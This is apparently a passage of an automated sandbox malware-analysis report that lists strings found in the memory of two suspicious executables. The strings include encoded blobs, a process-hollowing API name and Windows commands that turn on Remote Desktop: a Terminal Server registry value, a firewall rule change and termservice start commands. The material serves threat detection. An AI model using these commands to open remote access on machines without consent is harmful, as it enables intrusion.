                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000002.1267517499.0000000000311000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000003.1226965278.0000000004A10000.00000004.00001000.00020000.00000000.sdmp    String found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000003.1226965278.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE    String found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000002.1304814909.0000000000311000.00000040.00000001.01000000.0000000E.sdmp    String found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000002.1304814909.0000000000311000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000003.1251271116.0000000004B30000.00000004.00001000.00020000.00000000.sdmp    String found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000003.1251271116.0000000004B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe    String found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp    String found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 0000000D.00000003.1272817646.0000000004830000.00000004.00001000.00020000.00000000.sdmp    String found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000D.00000003.1272817646.0000000004830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
